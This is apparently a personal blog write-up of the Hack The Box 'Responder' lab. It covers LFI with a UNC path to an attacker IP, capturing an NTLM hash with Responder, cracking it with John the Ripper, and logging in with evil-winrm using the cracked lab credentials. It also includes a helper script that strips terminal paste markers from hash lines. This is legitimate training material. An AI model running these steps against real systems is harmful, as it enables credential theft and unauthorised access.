Hack The Box’s Responder. Later on, I might take more of a full walkthrough approach to documenting the rooms in both HTB and THM; for now, though, I have decided just to post my thoughts and the lessons I learned in some of the rooms.
This is my take on the HackTheBox.com room “Responder” in the Learn The Basics of Penetration Testing – Tier 1 – YOU NEED TO WALK BEFORE YOU CAN RUN – path. This room is listed as very easy and includes the tags “SAMBA”, “Enumeration”, “Apache” and “WinRM”. To work on this room I used an HP EliteBook x360 Gen3 I purchased off Craigslist, with 16GB of RAM and Kali on bare metal. I also have Kali in a VM using VirtualBox; in addition, I used a second PC, running Win11, to write notes and look up info.
This room took me over two days to complete. I found the room challenging and engaging; I had to use HTB’s walkthrough, Google, and YouTube to get past some of the questions. In this room, we start to see Local File Inclusion (LFI) vulnerabilities, password hashes, and more on PHP on Apache. This room introduced me to tools of the trade like John the Ripper, Evil-WinRM, and Responder.
Local File Inclusion Vulnerability
This was a new thing for me to learn in this crash course. I hadn’t heard of this before, although after looking it up on Google I realized I had seen it in the wild before and never knew the name. I had spent a good amount of time teaching myself HTML and using WordPress, but I never really used Apache and PHP much.
My basic takeaway was that using this exploit you can grab other information like hosts file info and a hash using Responder. I really need to look at this more in-depth in the coming days.
Using Responder
Just as LFI and PHP were new to me, I found that the instructions around Responder were a bit dated; I spent a while following the provided walkthrough and YouTube, only to have no success at all. The HTB walkthrough had instructions for Ubuntu and the CLI with Python3 commands. It started with the git command “git pull https://github.com/lgandx/Responder”, and I kept getting “fatal: Not a git repository (or any of the parent directories): .git”. I spent a while trying to fix this, but I ended up giving up when I realized that Responder was included with Kali. Additionally, the walkthrough had suggested running “sudo python3 Responder.py -I tunX“. This wasn’t working for me at all as I was on Kali; after a bit of reading the man page for Responder, I figured out that I could use “sudo responder -tun0 python3″ to get Responder working.
Again, the documentation said to go in Firefox to this: “http://unika.htb/?page=//10.10.14.25/somefile”. At this point Responder was not capturing the hashes as the instructions had indicated. I spent a while searching to see what the issue was. At some point, I figured out that I needed to change the IP listed in that link to the IP that Responder was listening on. Thus I changed the link to “http://unika.htb/?page=//10.10.X.X/somefile”, with the IP I was on.
In Responder’s “Generic Options” output this is listed as “Responder IP”; I plugged this in and captured the hash in no time at all.
Hash Cracking with John the Ripper
Once I had the hash, I encountered two different issues that I wasn’t expecting. In the instructions I was to run the command “john -w=/usr/share/wordlists/rockyou.txt hash.txt“. Well, I had forgotten this was a new VM; I hadn’t unzipped the file rockyou.txt.gz. OK, rookie mistake, so I had to unzip it. Now how to do that on Linux? After a while of searching Google, I found what I needed here – kali linux unzip rockyou.txt.gz Code Example (codegrepper.com) – I won’t make you click on the link; I will save you the time and effort.
No, neither gz nor unzip worked.
Use └─$ gunzip /usr/share/wordlists/rockyou.txt.gz – that’s right, step one of using John the Ripper, or just “john”, was to gunzip rockyou.txt.gz to rockyou.txt!!! I hope this will save you time!
Next Problem – No password hashes loaded (see FAQ)
This drove me crazy. I had the docs and knew the password was “badXXXXXXX”. I started troubleshooting: OK, “john” was up to date, the wordlist was unzipped, and the password was on the list, so it wasn’t that. OK, let’s look at the hash file. I tried renaming it; that wasn’t it.
I then moved the file to a directory on my machine so I could examine it better.
mkdir /usr/kali/hash
Copied and pasted the hash from Responder again:
┌──(kali㉿kali)-[/]
└─$ echo "^[[200~Administrator::RESPONDER:62decc7e96a8d…" > /usr/kali/hash/Responder_Hash_April232022.txt
Still the same error: “No password hashes loaded (see FAQ)”. OK, what gives? You might see the mistake at this point; I hadn’t noticed.
I started looking at that hash now and googling. I knew that I had the right hash from the box and I had the hash from the walkthrough, and both were giving the same error! I kept searching; maybe try “base64 -d hash.txt”, which did not work and gave me “invalid input”. I then tried “hash-identifier” and met the same type of errors. At this point, I ended up in a GUI text editor and grabbed the first Google result, “emacs”.
Now in the emacs GUI, I could see the issue right away:
To quote Mr Spock, I had more than a few choices of “colorful metaphors” – but for now I will default to “Bloody Hell”, to again quote O’Brien, and he must suffer. OK, all kidding aside, did you see the issue?
In the hash files I had copied and pasted from both the terminal and the documents, a string of text had been added to my paste!!!
In my Kali setup, whenever I paste anything into the terminal, I get the extra string “[200~”. I haven’t found the answer to why it does this, and it bit me in the ass here. I removed the extra string from all of my hash files and they all work now!
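Since john’s error message was the symptom rather than the cause, here is a small shell check worth keeping next to Responder’s output. It is an added example, not from the original post and not part of Responder’s or john’s own code. The extra “[200~” is the visible part of the bracketed-paste marker ESC[200~ (with ESC[201~ closing the paste) that a terminal in bracketed-paste mode wraps around pasted text; a program that does not understand the markers, such as echo or a here-doc, stores those bytes in the file, and john then cannot parse the line. The functions below strip the markers and check that what remains has the NetNTLMv2 layout that john’s netntlmv2 format expects, which is also the layout Responder prints. The sample line is constructed: the user and domain names come from the post, but the challenge, HMAC and blob values are made up. The hash.txt file name and the john --format=netntlmv2 invocation in the trailing comment are assumptions about the next step.

```shell
#!/bin/sh
# Added example (not from the original post): scrub a hash line pasted from
# Responder before handing it to john.
#
# A terminal in bracketed-paste mode wraps pasted text in ESC[200~ ... ESC[201~.
# If the program reading stdin does not consume those markers, they land in
# the file and john reports "No password hashes loaded (see FAQ)".

esc=$(printf '\033')

# clean_hash: read lines on stdin, drop the bracketed-paste markers and any
# leading/trailing whitespace, and skip lines that end up empty.
clean_hash() {
    sed -e "s/${esc}\\[200~//g" \
        -e "s/${esc}\\[201~//g" \
        -e 's/^[[:space:]]*//' \
        -e 's/[[:space:]]*$//' |
    grep -v '^$'
}

# is_netntlmv2: exit 0 if $1 has the layout john's netntlmv2 format expects:
#   user::domain:<16 hex server challenge>:<32 hex HMAC-MD5>:<hex NTLMv2 blob>
# The user field rejects control characters, so a line that still carries an
# ESC byte from a paste marker fails the check.
is_netntlmv2() {
    printf '%s\n' "$1" |
    grep -Eq '^[^:[:cntrl:]]+::[^:]*:[0-9A-Fa-f]{16}:[0-9A-Fa-f]{32}:[0-9A-Fa-f]+$'
}

# Demo on a CONSTRUCTED line: the hex values are made up, not a real capture.
# The ESC[200~ / ESC[201~ around it are what a bracketed paste adds.
sample=$(printf '\033[200~Administrator::RESPONDER:1122334455667788:00112233445566778899aabbccddeeff:0101000000000000abcdef\033[201~')

cleaned=$(printf '%s\n' "$sample" | clean_hash)

if is_netntlmv2 "$cleaned"; then
    printf 'clean hash: %s\n' "$cleaned"
    # On a real box the next step would be (assumed file name and format flag):
    #   printf '%s\n' "$cleaned" > hash.txt
    #   john --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
else
    printf 'line does not look like NetNTLMv2: %s\n' "$cleaned" >&2
    exit 1
fi
```

Piping the pasted text through clean_hash (for example, cat > hash.txt becoming cat | clean_hash > hash.txt) avoids the problem up front; running is_netntlmv2 over the file first tells you whether the line is malformed before you blame the wordlist or john itself.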
WinRM
Now that I had the username and password, I was able to easily use evil-winrm to get into the target workstation!
┌──(kali㉿kali)-[~/hash]
└─$ evil-winrm -i 10.129.231.181 -u administrator -p badminton
Once on this target I noticed it was Windows PowerShell, so it was back to Windows commands, like so: move around with “cd ..” and “dir” until you find flag.txt in a different user’s directory.
BOOM. That’s that and this room was done.
As I said, you can find full walkthroughs everywhere. In time, at the suggestion of “NetworkChuck”, I will be writing walkthroughs for a non-IT person so that I can get better at report writing. This is the next thing I would like to work on.
Thank you to CryptoCat; I used this YouTube video for help with this box! – Tier 1: Responder – HackTheBox Starting Point – Full Walkthrough – YouTube
Well, I am off to the next challenge and to enjoy the Saturday. Let me know what you think and how I can get better for the reader. Bye for now, and to quote Hak5, “Trust Your Technolust!”